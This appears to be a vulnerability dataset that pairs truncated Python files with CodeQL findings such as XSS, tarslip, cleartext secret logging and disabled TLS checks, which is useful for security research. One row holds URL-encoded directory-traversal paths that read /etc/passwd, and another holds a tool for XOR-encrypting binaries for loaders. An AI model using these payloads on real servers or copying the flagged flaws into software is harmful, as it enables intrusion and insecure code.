... | 30 | 30.43 | 76 | 11 | 241 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_28e488a423895390_aa3f52bf", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text."
] | [
7
] | [
null
] | [
11
] | [
14
] | |
2024-11-18T20:51:28.529988+00:00 | 1,620,905,511,000 | bffa9fd177bb9aa5154d250f73fa5d2582dab35e | 3 | {
"blob_id": "bffa9fd177bb9aa5154d250f73fa5d2582dab35e",
"branch_name": "refs/heads/master",
"committer_date": 1620905511000,
"content_id": "7b4e5744d7add52badbd56f05c9952c77118c898",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "7cebfa2066e679e19993a5507e59d1979df3d4a8",
"extension": "py"... | 3.0625 | stackv2 | from flask import Flask
import sqlite3 as sql
app = Flask(__name__)
# routing
@app.route("/")
def hello():
print("hello called")
return "Hello World!"
''' or add url rule using add_url_rule function
def hello_world():
return ‘hello world’
app.add_url_rule(‘/’, ‘hello’, hello_world)
'''
# accepting a s... | 41 | 22.76 | 103 | 9 | 266 | python | [{"finding_id": "codeql_py/flask-debug_e8e08fde8310a7bf_b9a53cd9", "tool_name": "codeql", "rule_id": "py/flask-debug", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.", ... | 4 | true | [
"CWE-215",
"CWE-079",
"CWE-079",
"CWE-079"
] | [
"py/flask-debug",
"py/reflective-xss",
"py/reflective-xss",
"py/reflective-xss"
] | [
"HIGH",
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.",
"Cross-site scripting vulnerability due to a [user-provided value](1).",
"Cross-site scripting vulnerability due to a [user-provided value](1).",
"Cross-site scripting vulnerability due to a ... | [
39,
24,
30,
36
] | [
null,
null,
null,
null
] | [
5,
12,
12,
12
] | [
24,
27,
25,
33
] | |
2024-11-18T21:13:56.052202+00:00 | 1,497,980,933,000 | 638a8fa2c262299443ccca12c907e8c585ade5b5 | 3 | {
"blob_id": "638a8fa2c262299443ccca12c907e8c585ade5b5",
"branch_name": "refs/heads/master",
"committer_date": 1497980933000,
"content_id": "69092b371b7638c72c9bcc1296208d7c756beda1",
"detected_licenses": [
"MIT"
],
"directory_id": "15e2efc70523f1e0bda3b9339cc520883d301abb",
"extension": "py",
"fi... | 3.375 | stackv2 | """MIT License
Copyright (c) 2017 Uka Osim
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distr... | 56 | 38.46 | 90 | 17 | 480 | python | [{"finding_id": "codeql_py/overly-large-range_9d50cc9d3e5c992a_cba54a3c", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that overlaps with \\w in the same character class.", "remediation": "", "loc... | 2 | true | [
"CWE-020",
"CWE-020"
] | [
"py/overly-large-range",
"py/overly-large-range"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"Suspicious character range that overlaps with \\w in the same character class.",
"Suspicious character range that overlaps with \\w in the same character class."
] | [
48,
48
] | [
null,
null
] | [
23,
26
] | [
26,
29
] | |
2024-11-18T21:14:00.304375+00:00 | 1,592,510,402,000 | b4e61725ceca4b3e360cf8271c1e92627422c1db | 2 | {
"blob_id": "b4e61725ceca4b3e360cf8271c1e92627422c1db",
"branch_name": "refs/heads/master",
"committer_date": 1592510402000,
"content_id": "61c4234100942593c2b975b9b34b1228ca5119e1",
"detected_licenses": [
"MIT"
],
"directory_id": "dffb3350729d8c3eb2a59da8f178a777ee56fca6",
"extension": "py",
"fi... | 2.4375 | stackv2 | #!/usr/bin/env python
# This script comes with no warranty use at your own risk
#
# Title: pause_snapshot
# Author: Drew Russell - Rubrik Ranger Team
# Date: 03/29/2018
# Python ver: 3.6.4
#
# Description:
#
# Pause and Resume a policy driven snapshot of a Virtual Machine
######################################## User ... | 224 | 28.46 | 141 | 21 | 1,483 | python | [{"finding_id": "codeql_py/request-without-cert-validation_c8189cab9854cc27_af671b94", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 2 | true | [
"CWE-295",
"CWE-295"
] | [
"py/request-without-cert-validation",
"py/request-without-cert-validation"
] | [
"MEDIUM",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1).",
"This request may run without certificate validation because [it is disabled](1)."
] | [
76,
104
] | [
null,
null
] | [
23,
16
] | [
92,
93
] | |
2024-11-18T21:14:05.785747+00:00 | 1,619,534,653,000 | 00bebc715a70c307f24aedd7f37290eb8bbbde6b | 3 | {
"blob_id": "00bebc715a70c307f24aedd7f37290eb8bbbde6b",
"branch_name": "refs/heads/main",
"committer_date": 1619534653000,
"content_id": "019bc6007b2117d0a9872b1910c1246ed2df2b0d",
"detected_licenses": [
"MIT"
],
"directory_id": "5c5e2af6257627c6932bba48699829a128655a8e",
"extension": "py",
"file... | 2.515625 | stackv2 | # -*- coding: utf-8 -*-
# Copyright 2018 The TensorFlow Authors and jiahuei. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENS... | 318 | 32.41 | 88 | 21 | 2,541 | python | [{"finding_id": "codeql_py/tarslip_e0181a77fab70b01_8344954a", "tool_name": "codeql", "rule_id": "py/tarslip", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This file extraction depends on a [potentially untrusted source](1).", "remediation": "", "location": {"file_path": "un... | 1 | true | [
"CWE-022"
] | [
"py/tarslip"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This file extraction depends on a [potentially untrusted source](1)."
] | [
309
] | [
null
] | [
21
] | [
28
] | |
2024-11-18T21:14:06.341735+00:00 | 1,480,364,796,000 | 018af0dc5ebad1aec58a93105da341657311e19b | 2 | {
"blob_id": "018af0dc5ebad1aec58a93105da341657311e19b",
"branch_name": "refs/heads/master",
"committer_date": 1480364796000,
"content_id": "3193195b7a6d0dc108e1c1aa9c18be193d264bad",
"detected_licenses": [
"MIT"
],
"directory_id": "96cdabe5d336b05cee68444109ac2978f1f3e617",
"extension": "py",
"fi... | 2.3125 | stackv2 | from flask import redirect, url_for, render_template, request, flash, abort
from flask_login import login_user, logout_user, login_required, current_user
from sqlalchemy import func
from sqlalchemy.exc import IntegrityError
from nodeadmin import app, login_manager, db
from nodeadmin.models import *
from nodeadmin.form... | 112 | 31.74 | 77 | 16 | 807 | python | [{"finding_id": "codeql_py/url-redirection_b38f5a4d963a563e_7fd3a3c0", "tool_name": "codeql", "rule_id": "py/url-redirection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Untrusted URL redirection depends on a [user-provided value](1).", "remediation": "", "location": {"file_... | 1 | true | [
"CWE-601"
] | [
"py/url-redirection"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Untrusted URL redirection depends on a [user-provided value](1)."
] | [
31
] | [
null
] | [
25
] | [
48
] | |
2024-11-18T21:14:11.402179+00:00 | 1,575,950,397,000 | 3b15d16480936c27e2f503c5eab334c03e972a39 | 2 | {
"blob_id": "3b15d16480936c27e2f503c5eab334c03e972a39",
"branch_name": "refs/heads/master",
"committer_date": 1575950397000,
"content_id": "aeb7ae5b9209e4e2e62141edc93061d4b6a813f6",
"detected_licenses": [
"MIT"
],
"directory_id": "9379ed55226124493d637b2a3f964fe49c23497e",
"extension": "py",
"fi... | 2.453125 | stackv2 | import json
import requests
import math
import pandas as pd
import numpy as np
from mendeleev import element
from periodictable import formulas
materials_codes = open("Raw_dataset/full_mpid_list_cell_size_sort.txt")
# materials_codes = open("Raw_dataset/mpid_list_cell_size_sort_end.txt")
url_base = "https://www.mater... | 52 | 25.54 | 88 | 14 | 383 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_896e1072c6efc25e_4e7b1d23", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text."
] | [
44
] | [
null
] | [
7
] | [
19
] | |
2024-11-18T21:14:18.088094+00:00 | 1,583,695,288,000 | d86fe10a732119f6afb78d1d69ec61fa2ddd2a3d | 3 | {
"blob_id": "d86fe10a732119f6afb78d1d69ec61fa2ddd2a3d",
"branch_name": "refs/heads/master",
"committer_date": 1583695288000,
"content_id": "31c8031f099de6ee7503deb19194f8c1477da942",
"detected_licenses": [
"Unlicense"
],
"directory_id": "d02275e2b28311be5f7ed2af35c6d64aa722606e",
"extension": "py",... | 2.875 | stackv2 | #!/usr/bin/python
#
#
# Simple tool to take an arbitrary binary (DLL, exe, etc.)
# and convert it to a XOR encrypted char array for embedding
# in loaders that decrypt the data in memory and do something
# useful with it.
#
# Drew Kirkpatrick
# drew.kirkpatrick@gmail.com
# @hoodoer
#
# Various bits borrowed and stole... | 134 | 23.46 | 103 | 14 | 808 | python | [{"finding_id": "codeql_py/clear-text-storage-sensitive-data_d79c231678a45651_0f0ea832", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (password)](1) as clear text."... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-storage-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression stores [sensitive data (password)](1) as clear text."
] | [
127
] | [
null
] | [
25
] | [
39
] | |
2024-11-18T21:14:22.048324+00:00 | 1,678,181,179,000 | 742c90df1676d80ceb0c7fa6d7436da3bc078fa7 | 2 | {
"blob_id": "742c90df1676d80ceb0c7fa6d7436da3bc078fa7",
"branch_name": "refs/heads/master",
"committer_date": 1678181179000,
"content_id": "033f46f25afa686c8edc72351e3e39d748127709",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "7a7af74cf20411f6d49007ff441301bfa5291c71",
"extension": "py"... | 2.3125 | stackv2 | #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, softwar... | 83 | 38.67 | 109 | 11 | 716 | python | [{"finding_id": "codeql_py/tarslip_a2128a93353ba94a_d3da8a45", "tool_name": "codeql", "rule_id": "py/tarslip", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This file extraction depends on a [potentially untrusted source](1).", "remediation": "", "location": {"file_path": "un... | 1 | true | [
"CWE-022"
] | [
"py/tarslip"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This file extraction depends on a [potentially untrusted source](1)."
] | [
40
] | [
null
] | [
5
] | [
8
] | |
2024-11-18T21:14:41.387953+00:00 | 1,606,301,386,000 | 13d0bd3f981622f47bc66c4cff658cfc64dd7b7c | 3 | {
"blob_id": "13d0bd3f981622f47bc66c4cff658cfc64dd7b7c",
"branch_name": "refs/heads/main",
"committer_date": 1606301386000,
"content_id": "286f92ebb5154f029dc74cb4323b06ce3753f2d9",
"detected_licenses": [
"MIT"
],
"directory_id": "801e36b6852349761332a6dc3f4e0038a2872868",
"extension": "py",
"file... | 2.859375 | stackv2 | import bcrypt as bc
import time, sys, os, random
BASEPATH = os.path.join(os.sep, 'davide', 'home', 'userexternal', 'mberti00', 'Scripts', 'Crack')
if len(sys.argv) > 1 and int(sys.argv[1]):
max_number = int(sys.argv[1])
if len(sys.argv) > 2:
if sys.argv[2] == 'random':
# random word betwee... | 52 | 32.35 | 101 | 18 | 451 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_0d463db3dbc925f7_435afdb4", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text.\nThis expression logs [sensitive data (password)](3) as clear text."
] | [
30
] | [
null
] | [
7
] | [
101
] | |
2024-11-18T20:10:46.714760+00:00 | 1,417,706,858,000 | cdb31ae623a585c9f777e63199b4d61a6b019f8c | 3 | {
"blob_id": "cdb31ae623a585c9f777e63199b4d61a6b019f8c",
"branch_name": "refs/heads/master",
"committer_date": 1417706858000,
"content_id": "2221eff5c85e2132c55b00a059166ad1765304e2",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "95f422c2ef2b1f1b4c6a6707002aab63cc5a2c39",
"extension": "py"... | 3.265625 | stackv2 | from Crypto.Cipher import Blowfish
import binascii
class MyBlowFish:
"""
Blow fish encryption and decryption
"""
def __init__(self, key):
self.key = key
@staticmethod
def padding_pcks5(clear_text):
byte_num = len(clear_text)
packing_len = 8 - byte_num % 8
appen... | 39 | 26.18 | 64 | 12 | 260 | python | [{"finding_id": "codeql_py/weak-cryptographic-algorithm_ba2ab439527da89c_dec7d311", "tool_name": "codeql", "rule_id": "py/weak-cryptographic-algorithm", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "[The block mode ECB](1) is broken or weak, and should not be used.", "remediation": ... | 2 | true | [
"CWE-327",
"CWE-327"
] | [
"py/weak-cryptographic-algorithm",
"py/weak-cryptographic-algorithm"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"[The block mode ECB](1) is broken or weak, and should not be used.",
"[The block mode ECB](1) is broken or weak, and should not be used."
] | [
22,
26
] | [
null,
null
] | [
16,
42
] | [
41,
64
] | |
2024-11-18T20:11:01.371663+00:00 | 1,687,413,046,000 | e25f07536092e93edc667c6a6a755a3f6c48c3be | 3 | {
"blob_id": "e25f07536092e93edc667c6a6a755a3f6c48c3be",
"branch_name": "refs/heads/master",
"committer_date": 1687413046000,
"content_id": "9191cf44c5fb9592a4627cab674a7394656d88e6",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "39edd58f22cea9d92fa8a4e5c7704d3f1a59a979",
"extension": "py"... | 2.90625 | stackv2 | import datetime
import time
import numpy as np
import requests
USER_AGENT = (
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/68.0.3440.84 Safari/537.36"
)
def requests_get(url, header):
try:
res = requests.get(url, verify=False, timeout=10, headers=he... | 165 | 26.55 | 87 | 16 | 1,436 | python | [{"finding_id": "codeql_py/request-without-cert-validation_664ae98ecd153c74_8d139d8c", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 2 | true | [
"CWE-295",
"CWE-295"
] | [
"py/request-without-cert-validation",
"py/request-without-cert-validation"
] | [
"MEDIUM",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1).",
"This request may run without certificate validation because [it is disabled](1)."
] | [
15,
24
] | [
null,
26
] | [
15,
15
] | [
74,
10
] | |
2024-11-18T20:48:10.624605+00:00 | 1,570,814,301,000 | 60629729a22703f94670de36e2bf4072c7df3417 | 3 | {
"blob_id": "60629729a22703f94670de36e2bf4072c7df3417",
"branch_name": "refs/heads/master",
"committer_date": 1570814301000,
"content_id": "f4576cf39d4b371507c369128b16230979538716",
"detected_licenses": [
"MIT"
],
"directory_id": "8c91511845bd3574e02f999b75e263b152698b99",
"extension": "py",
"fi... | 3.421875 | stackv2 | titulo = 'JOGO DA FORCA'
linha1 = '←' * 10
linha2 = '→' * 10
linha3 = '—' * 30
linha4 = '*' * 26
linha5 = '←' * 42
linha6 = '→' * 42
chancesLimite = 0
chances = 1
l = 0
from random import randint
y = randint
print()
print(linha1, end= '')
print(linha2)
print(titulo.center(22))
print(linha2, end='')
print(linha1)
pr... | 91 | 21.74 | 81 | 16 | 675 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_6258a98b9a5deb42_5476c68a", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (secret)](1) as clear text."
] | [
39
] | [
null
] | [
7
] | [
21
] | |
2024-11-18T20:48:17.514837+00:00 | 1,633,961,467,000 | b5f2e389d482ee496a3f5baf497ef147175a4719 | 3 | {
"blob_id": "b5f2e389d482ee496a3f5baf497ef147175a4719",
"branch_name": "refs/heads/main",
"committer_date": 1633961467000,
"content_id": "f4e15eb810e970ccbca182079e48f24eda053b01",
"detected_licenses": [
"BSD-3-Clause"
],
"directory_id": "6ef9b86ddfbd7034ab43f6687541d99fe67ecc75",
"extension": "py"... | 2.59375 | stackv2 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
def pathnya():
path1 = '/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd'
path2 = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
path3 = '/icons/%%32%65%%32%65/%%32%6... | 60 | 36.92 | 138 | 16 | 830 | python | [{"finding_id": "codeql_py/request-without-cert-validation_e94e7dfa5fbd852b_941c62ee", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 4 | true | [
"CWE-295",
"CWE-295",
"CWE-295",
"CWE-295"
] | [
"py/request-without-cert-validation",
"py/request-without-cert-validation",
"py/request-without-cert-validation",
"py/request-without-cert-validation"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1).",
"This request may run without certificate validation because [it is disabled](1).",
"This request may run without certificate validation because [it is disabled](1).",
"This request may run without certificate validation becau... | [
26,
34,
42,
50
] | [
null,
null,
null,
null
] | [
23,
23,
23,
23
] | [
86,
86,
86,
86
] | |
2024-11-18T20:48:34.090765+00:00 | 1,530,776,283,000 | a94b30d05d43fcf586df73b6e9202be293d302e4 | 3 | {
"blob_id": "a94b30d05d43fcf586df73b6e9202be293d302e4",
"branch_name": "refs/heads/master",
"committer_date": 1530776283000,
"content_id": "dfc6a5a0c1492df707c692aa83ee244bce82f026",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "f09799389e387561f5ba38ed4605460d29b14e2a",
"extension": "py"... | 3 | stackv2 | from flask import Flask, request, abort
app = Flask(__name__)
@app.route('/')
def welcome():
return "Basic webserver, returns data received through /add_message"
@app.route('/add_message', methods=['POST'])
def add_message():
if request.method == 'POST':
if request.data:
print "received... | 25 | 22.44 | 72 | 13 | 133 | python | [{"finding_id": "codeql_py/reflective-xss_062b9fc6be5ce6f1_6da4bb79", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi... | 1 | true | [
"CWE-079"
] | [
"py/reflective-xss"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Cross-site scripting vulnerability due to a [user-provided value](1)."
] | [
16
] | [
null
] | [
20
] | [
32
] | |
2024-11-18T21:25:55.123663+00:00 | 1,580,313,784,000 | 940a3130c6e5df92455677eefd31a6dcd982600c | 2 | {
"blob_id": "940a3130c6e5df92455677eefd31a6dcd982600c",
"branch_name": "refs/heads/master",
"committer_date": 1580313784000,
"content_id": "d4a2c831b5eac495e354c6654c2e06a21e8e0e92",
"detected_licenses": [
"MIT"
],
"directory_id": "72d95f3b8c4de3e76c1125b2e6573539cadbe66a",
"extension": "py",
"fi... | 2.375 | stackv2 | # coding: utf-8
#!/usr/bin/env python3
'Tencent ASR && TTS API'
__author__ = 'Charles Li, Joseph Pan'
import time
import uuid
import json
import random
import requests
import hmac
import base64
import urllib
#腾讯web API一句话识别请求
class tencentSpeech(object):
__slots__ = 'SECRET_ID', 'SECRET_KEY', 'SourceType', 'URL'... | 214 | 37.36 | 127 | 18 | 1,938 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_45e68bfabee0f76a_722962a7", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (secret)](1) is used in a hashing algorithm (SHA1) that is insecu... | 1 | true | [
"CWE-327"
] | [
"py/weak-sensitive-data-hashing"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Sensitive data (secret)](1) is used in a hashing algorithm (SHA1) that is insecure.\n[Sensitive data (id)](2) is used in a hashing algorithm (SHA1) that is insecure.\n[Sensitive data (secret)](3) is used in a hashing algorithm (SHA1) that is insecure."
] | [
209
] | [
null
] | [
48
] | [
64
] | |
2024-11-18T21:52:05.755456+00:00 | 1,448,909,025,000 | cc53d4e1c09e8c39ad29ed19c0ef7ba9f5a59b9e | 3 | {
"blob_id": "cc53d4e1c09e8c39ad29ed19c0ef7ba9f5a59b9e",
"branch_name": "refs/heads/master",
"committer_date": 1448909025000,
"content_id": "f937bd57338855909ba2da0e88387de01d065403",
"detected_licenses": [
"BSD-2-Clause"
],
"directory_id": "d83d59f27aef33cb6e25e7ccc062d290d15b2a9d",
"extension": "p... | 2.5625 | stackv2 | # coding: utf-8
import requests
from functools import wraps
VERSION = 'v1'
PAGESIZE = 10
def must_have_token(func):
@wraps(func)
def wrapper(*args, **kwargs):
if not args[0].token:
raise ValueError('You must specify a valid user token to use this method')
result = func(*args, **kwa... | 43 | 22.65 | 86 | 13 | 239 | python | [{"finding_id": "codeql_py/request-without-cert-validation_2b9a7a9dd890a38c_18eb8f70", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 1 | true | [
"CWE-295"
] | [
"py/request-without-cert-validation"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1) by [this value](2)."
] | [
38
] | [
null
] | [
20
] | [
72
] | |
2024-11-18T21:52:09.110062+00:00 | 1,693,344,208,000 | 791afd7ce5e1df2b468b2c42e3ba75d7946b97d3 | 3 | {
"blob_id": "791afd7ce5e1df2b468b2c42e3ba75d7946b97d3",
"branch_name": "refs/heads/main",
"committer_date": 1693344208000,
"content_id": "5303e89e2224d49593d83885a9761a49e85f3c2b",
"detected_licenses": [
"MIT"
],
"directory_id": "4cbc8b81d197bc392d1b57856254300331b9738f",
"extension": "py",
"file... | 2.6875 | stackv2 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
modules = ['urllib','requests','random','click','os']
for module in modules:
try:
__import__(module)
except Exception as e:
print('Installing modules...')
os.system('pip3 install ' + str(module))
# os.system('clear')
import click
... | 26 | 23.85 | 109 | 13 | 158 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_1dac4d6ae063e2ab_d39fd72c", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text."
] | [
22
] | [
null
] | [
15
] | [
38
] | |
2024-11-18T21:52:09.592762+00:00 | 1,483,967,690,000 | cbc647a25f211239dc85170f8cbf8c8909aea45e | 2 | {
"blob_id": "cbc647a25f211239dc85170f8cbf8c8909aea45e",
"branch_name": "refs/heads/master",
"committer_date": 1483967690000,
"content_id": "793e20c23db746c1943d5d245f628e40c633195d",
"detected_licenses": [
"MIT"
],
"directory_id": "745543452be89d426825b797d2cd4a28f7ffced7",
"extension": "py",
"fi... | 2.390625 | stackv2 | #!/usr/bin/env python
from __future__ import print_function
import requests
import prettytable
import memoizer
import argparse
import json
import os
try:
import ConfigParser
except:
from configparser import ConfigParser
from . import __version__
config_file_path = "~/.redmine-cli"
api_key = None
root_u... | 229 | 28.23 | 112 | 15 | 1,570 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_69022e2dc92ed204_6eb0b055", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT... | 2 | true | [
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text.",
"This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text."
] | [
87,
103
] | [
null,
null
] | [
15,
15
] | [
52,
82
] | |
2024-11-18T21:52:12.280446+00:00 | 1,577,737,641,000 | 296aeb47788bbf6c95ac2ef7552108c615c94cae | 3 | {
"blob_id": "296aeb47788bbf6c95ac2ef7552108c615c94cae",
"branch_name": "refs/heads/master",
"committer_date": 1577737641000,
"content_id": "bab0cb8acf1328bc737f58f6212695c9dc987524",
"detected_licenses": [
"BSD-3-Clause"
],
"directory_id": "235ae3d94ec178d36de926a5cf3766aa211c0fc8",
"extension": "p... | 2.875 | stackv2 | import re
import os
import sys
# NOTICE!
# Before run you have to:
# 0. Create NOTE_DIR and BEAR_DIR dirs
# 1. Run commands near `files = [` and `dirs = [`
# 2. Paste the results in shown format
# Optionally you can also change below config dirs
# config dirs
NOTE_DIR = "Notes/" # output dir
BEAR_DIR =... | 133 | 26.41 | 104 | 19 | 920 | python | [{"finding_id": "codeql_py/overly-large-range_073a0f287c919f3f_df36e55a", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that is equivalent to \\[A-Z\\\\[\\\\\\\\]^_`a-z\\].", "remediation": "", "lo... | 2 | true | [
"CWE-020",
"CWE-020"
] | [
"py/overly-large-range",
"py/overly-large-range"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"Suspicious character range that is equivalent to \\[A-Z\\\\[\\\\\\\\]^_`a-z\\].",
"Suspicious character range that is equivalent to \\[A-Z\\\\[\\\\\\\\]^_`a-z\\]."
] | [
41,
41
] | [
null,
null
] | [
35,
42
] | [
38,
45
] | |
2024-11-18T21:52:15.960803+00:00 | 1,641,173,647,000 | 470ab7dee103180f8225542a56f6e431d544da3c | 2 | {
"blob_id": "470ab7dee103180f8225542a56f6e431d544da3c",
"branch_name": "refs/heads/master",
"committer_date": 1641173647000,
"content_id": "72504a6798dfd7afe91c1e8ad9d9cc0310535cbd",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "4d094be19bcde6088d3e59e2146ef1ba5f2fbfdd",
"extension": "py"... | 2.34375 | stackv2 | # -*- coding: utf-8 -*-
#
# Copyright 2017 Open Targets
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or... | 316 | 34.21 | 117 | 16 | 2,576 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_03159f0d9105df68_38679031", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text."
] | [
242
] | [
null
] | [
22
] | [
66
] | |
2024-11-18T21:52:17.866757+00:00 | 1,541,147,169,000 | c0b106b250ad82b02114c6119170ca78cef75292 | 3 | {
"blob_id": "c0b106b250ad82b02114c6119170ca78cef75292",
"branch_name": "refs/heads/master",
"committer_date": 1541147169000,
"content_id": "a13b2f0b22b78e95cd8e9f859944650d6d207e2a",
"detected_licenses": [
"MIT"
],
"directory_id": "3441e2f3d36ad9de6b57e6ccf4b2dc3172430446",
"extension": "py",
"fi... | 2.546875 | stackv2 | #!/usr/bin/env python
import json
from jinja2 import Template, Environment, FileSystemLoader
id_counter = 0
def counter():
global id_counter
id_counter += 1
return '{}'.format(id_counter)
def reset_counter():
global id_counter
id_counter = 0
return ''
def main(data, template, output_file):
